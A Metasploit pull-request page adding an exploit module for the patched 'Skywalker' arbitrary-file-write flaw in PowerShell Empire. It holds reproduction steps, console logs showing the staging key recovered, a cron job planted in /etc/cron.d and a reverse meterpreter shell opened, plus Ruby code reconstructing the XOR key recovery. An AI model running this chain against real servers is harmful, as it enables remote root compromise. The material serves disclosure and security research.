PowerShellEmpire Arbitrary File Upload (Skywalker) #7450

Merged
merged 3 commits into from Nov 17, 2016

@wolfthefallen
Contributor

wolfthefallen commented Oct 17, 2016

This PR adds an exploit module that leverages the arbitrary file upload
vulnerability in PowershellEmpire dubbed "Skywalker". Versions prior to f030cf62
are vulnerable.

The module recovers the staging key by XORing specific offsets from the
powershell stage file which contain punctuation. Using punctuation characters
is necessary due to how Empire obfuscates the plaintext stage by shuffling the
case of alphabetic characters. Once the staging key has been recovered, the
module negotiates an RSA key to simulate an agent connecting. Once a fake agent
is negotiated, the malicious agent crafts and sends a response to a DOWNLOAD
task which leverages the traversal flaw, allowing a file to be written to the
filesystem with the privileges of the Empire user.

The blog reference for the vulnerability is live.

Verification

Empire Setup

  • Clone https://github.com/adaptivethreat/Empire.git
  • Checkout commit 03ca7bdb (the last unpatched commit)
  • Run through the setup with setup/install.sh
  • Start Empire as root
  • Start a listener

Exploitation

  • Start msfconsole
  • use exploit/linux/http/empire_skywalker
  • Set the options appropriately and set VERBOSE to true
  • Verify that the staging key is recovered (only printed when VERBOSE is true)
  • After a minute a session should be opened

Example Output

sysmsf > use exploit/linux/http/empire_skywalker
msf exploit(empire_skywalker) > set RHOST 172.20.220.182
RHOST => 172.20.220.182
msf exploit(empire_skywalker) > set RPORT 80
RPORT => 80
msf exploit(empire_skywalker) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf exploit(empire_skywalker) > set LHOST 172.20.220.182
LHOST => 172.20.220.182
msf exploit(empire_skywalker) > check
[*] 172.20.220.182:80 The target appears to be vulnerable.
msf exploit(empire_skywalker) > set verbose TRUE
verbose => true
msf exploit(empire_skywalker) > exploit

[*] Started reverse TCP handler on 172.20.220.182:4444
[*] Recovering the staging key...
[*] Successfully recovered the staging key: 28:2e:49:42:56:74:5a:76:6b:7e:29:2a:60:50:54:40:65:5d:77:2f:6e:37:35:6d:78:4f:34:72:66:3d:2d:62
[*] Successfully sent the RSA key
[*] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/ooJpUCid
[*] Writing cron job to /etc/cron.d/inqIBwaE
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38289 bytes) to 172.20.220.182
[+] Deleted /etc/cron.d/inqIBwaE
[+] Deleted /tmp/ooJpUCid
[+] Deleted /agent.log

meterpreter > sysinfo
Computer     : fwsb
OS           : Linux 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016
Architecture : x86_64
Meterpreter  : python/linux
meterpreter >

CC: @HarmJ0y @zeroSteiner
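As an added illustration of the key-recovery step described in this PR (a constructed example written for this page, not code from the Metasploit module or from Empire), the Ruby below shows why a repeating 32-byte XOR key leaks to anyone who knows the stager template: case shuffling alters letters only, so every punctuation or digit offset gives one exact key byte. The stage text, the key, and the `shuffle_case`, `recover_key` and `demo` names are assumptions made for this example.

```ruby
# Added example (not code from the Metasploit module or from Empire): a
# constructed reconstruction of the known-plaintext key recovery the PR
# describes, showing why case shuffling does not protect a repeating-key
# XOR stage. The stage text and key below are made up for this demo.
KEY_LEN = 32

# Stand-in for the stager template an attacker can read from the public
# source. Case shuffling leaves punctuation and digits unchanged.
KNOWN_STAGE = "$wc=New-Object System.Net.WebClient;" \
              "$wc.Headers.Add('User-Agent','Mozilla/5.0');" \
              "$data=$wc.DownloadData('http://127.0.0.1:80/index.asp');" \
              "$iv=$data[0..3];$key=$data[4..35];$i=0;"

# Repeating-key XOR, the only transformation applied to the stage here.
def xor_bytes(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }.pack('C*')
end

# Mimics the obfuscation the PR describes: every letter may flip case.
def shuffle_case(text, rng)
  text.each_char.map { |c| c.match?(/[A-Za-z]/) && rng.rand(2) == 1 ? c.swapcase : c }.join
end

# Recover key bytes from offsets whose known plaintext is not a letter.
# Those bytes survive the case shuffle, so ct[i] ^ pt[i] is exactly
# key[i % key_len]. Letter offsets would be off by 0x20 about half the
# time, so they are skipped. Returns an Array with nil for positions no
# non-letter offset covers; raises if two offsets disagree, which would
# mean the assumed plaintext does not match this stage.
def recover_key(ciphertext, known_plaintext, key_len = KEY_LEN)
  key = Array.new(key_len)
  known_plaintext.each_char.with_index do |c, i|
    next if c.match?(/[A-Za-z]/)
    k = ciphertext.getbyte(i) ^ c.ord
    pos = i % key_len
    raise "conflict at offset #{i}" if key[pos] && key[pos] != k
    key[pos] = k
  end
  key
end

# Full round trip on constructed data: shuffle case, XOR, recover.
def demo(seed = 1)
  real_key  = Random.new(seed).bytes(KEY_LEN)
  stage     = shuffle_case(KNOWN_STAGE, Random.new(seed + 1))
  recovered = recover_key(xor_bytes(stage, real_key), KNOWN_STAGE)
  { real: real_key.bytes, recovered: recovered, covered: recovered.compact.size }
end
```

Every non-nil entry of `recovered` matches the real key byte at that position; positions left nil are those the punctuation and digit offsets of this short template never reach.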


Contributor

wvu-r7 commented Oct 17, 2016

Nice work, gents. I assume this requires root due to the /etc/cron.d write.


Contributor

wolfthefallen commented Oct 17, 2016

Yes, for this exploit to work Empire will have to be running as root. Most of the use cases for Empire require it to run as root for port binding and other functions, so there is a high probability of this exploit working against unpatched versions.

If the Empire instance is not running as root, the arbitrary file write vulnerability still exists but only has the write permissions of the user it is running as.


Contributor

justinsteven commented Oct 18, 2016

STAGE0_URI and STAGE1_URI can be configured by the Empire admin. The module bakes in sensible values for each as per setup_database.py that ships with Empire, but these should probably be lifted into the Datastore (with sensible defaults as per setup_database.py) so the user can modify them if they know the values that the Empire admin has set them to (just as has been done for PROFILE).


HarmJ0y commented Oct 18, 2016

FYI the post with details is now live, and the issue was fixed 30 days ago shortly after @zeroSteiner's disclosure.

@wolfthefallen wolfthefallen changed the title from EmpirePowerShell Arbitrary File Upload (Skywalker) to PowerShellEmpire Arbitrary File Upload (Skywalker) Nov 13, 2016

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2016

Contributor

wchen-r7 commented Nov 17, 2016

Works for me:

[*] Reloading module...

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Recovering the staging key...
[*] Successfully recovered the staging key: 37:63:64:38:61:35:62:64:37:38:62:34:35:35:61:35:65:31:38:61:66:65:62:63:31:65:66:65:30:30:65:35
[*] Successfully sent the RSA key
[*] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/SJaIENpY
[*] Writing cron job to /etc/cron.d/ApTWJOvD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38289 bytes) to 192.168.146.183
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.183:58850) at 2016-11-17 17:40:01 -0600
[+] Deleted /etc/cron.d/ApTWJOvD
[+] Deleted /tmp/SJaIENpY
[+] Deleted /agent.log

meterpreter > 

Contributor

wchen-r7 commented Nov 17, 2016

Yeah, I'll land it.

@wchen-r7 wchen-r7 merged commit 684feb6 into rapid7:master Nov 17, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Nov 17, 2016


Contributor

wchen-r7 commented Nov 17, 2016

Release Notes

This module exploits a vulnerability in PowerShellEmpire. By recovering the staging key, the module is able to communicate using a malicious agent, and triggers a download task that leverages a traversal vulnerability in order to write to an arbitrary location, which results in remote code execution.
